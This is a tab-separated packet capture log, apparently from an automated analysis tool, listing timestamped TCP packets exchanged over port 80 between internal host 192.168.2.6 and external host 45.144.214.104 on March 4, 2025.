Mar 4, 2025 09:35:23.463213921 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463262081 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463273048 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463284969 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463310957 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463381052 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463459015 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463470936 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463485956 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463502884 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463531971 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463565111 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463604927 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463627100 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463638067 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463676929 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463697910 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463713884 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463756084 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463779926 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463793993 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463824034 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463890076 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463901997 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463946104 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.464071035 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464126110 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464137077 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464164019 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.464247942 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464260101 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464272022 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464335918 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.464364052 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464375019 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464380980 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464394093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464426041 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.464451075 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.464478970 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464541912 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464554071 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464603901 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.464633942 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.464685917 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.592390060 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.592402935 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.592420101 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.592432022 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.592442989 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.592454910 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.592551947 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.592591047 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.592609882 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.592657089 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.593410969 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593420029 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593430996 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593472004 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.593493938 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593507051 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593524933 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593544006 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.593565941 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.593642950 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593652964 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593687057 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.593693018 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593760014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593770981 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593807936 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.593822956 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593851089 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593894005 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.593952894 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593962908 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.593995094 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594054937 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594064951 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594079018 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594093084 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594115019 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594194889 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594229937 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594257116 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594268084 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594304085 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594376087 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594389915 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594399929 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594413996 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594424009 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594461918 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594537020 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594548941 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594609976 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594626904 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594659090 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594667912 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594712973 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594727039 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594769955 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594784021 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594846010 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594873905 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594959021 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594963074 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.594973087 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.594996929 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.595005035 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595046997 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595057964 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595089912 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.595102072 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595180988 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595192909 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595222950 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.595268965 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595283031 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595293999 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.595304966 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.595324993 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.723186016 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.723201990 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.723225117 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.723237038 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.723248959 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.723267078 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.723283052 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.723290920 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.723341942 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724010944 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724065065 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724077940 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724119902 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724134922 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724145889 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724178076 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724219084 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724286079 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724298000 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724309921 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724339008 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724360943 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724389076 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724430084 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724445105 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724478006 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724632978 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724643946 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724656105 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724667072 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724677086 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724711895 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724734068 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724745035 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724757910 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724790096 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724806070 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.724817038 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724912882 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724925041 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.724961042 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725059986 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725070953 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725080967 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725096941 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725106955 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725126982 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725234032 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725291014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725303888 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725315094 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725327969 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725337982 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725346088 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725366116 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725378990 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725442886 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725455046 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725496054 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725506067 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725506067 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725558043 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725569010 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725605965 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725667953 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725681067 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725727081 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725749016 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725759983 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725780964 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725799084 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725830078 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.725894928 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725910902 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.725990057 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.726001024 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.726079941 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.726079941 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.853934050 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.853949070 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.853967905 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854058027 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.854074955 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854087114 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854187012 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854192972 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.854203939 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854234934 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.854692936 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854701996 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854737997 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.854752064 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854778051 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854792118 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854808092 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.854829073 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.854877949 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854963064 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854974985 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.854986906 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855021954 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855038881 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855051041 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855113029 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855124950 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855159998 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855222940 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855235100 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855259895 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855271101 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855315924 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855336905 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855349064 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855428934 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855439901 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855492115 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855499029 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855521917 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855583906 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855633020 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855654955 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855665922 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855726004 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855783939 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855796099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855807066 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855823994 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855830908 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855855942 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.855942011 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855953932 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.855993986 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856035948 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856082916 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856091976 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856105089 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856162071 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856185913 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856197119 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856223106 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856260061 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856271982 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856376886 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856383085 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856400967 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856412888 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856431007 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856448889 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856476068 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856487036 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856498003 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856547117 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856623888 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856667042 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856682062 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856693029 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.856729031 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.856750011 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.985171080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985227108 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985239983 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985275984 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.985307932 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985320091 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985330105 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985342979 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985352993 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.985362053 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985374928 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.985411882 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.985785007 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985821009 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985832930 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985873938 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.985901117 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.985956907 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.985979080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986027956 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986038923 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986043930 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986078978 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986105919 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986174107 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986185074 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986196041 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986207962 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986223936 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986231089 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986242056 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986387014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986398935 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986409903 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986429930 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986453056 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986536980 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986547947 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986560106 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986592054 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986668110 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986679077 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986691952 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986700058 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986710072 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986723900 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986731052 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986772060 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.986936092 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986948013 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986959934 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.986989975 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987025976 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987037897 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987050056 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987061024 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987070084 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987087965 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.987164021 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.987200022 CET	49709	80	192.168.2.6	45.144.214.104
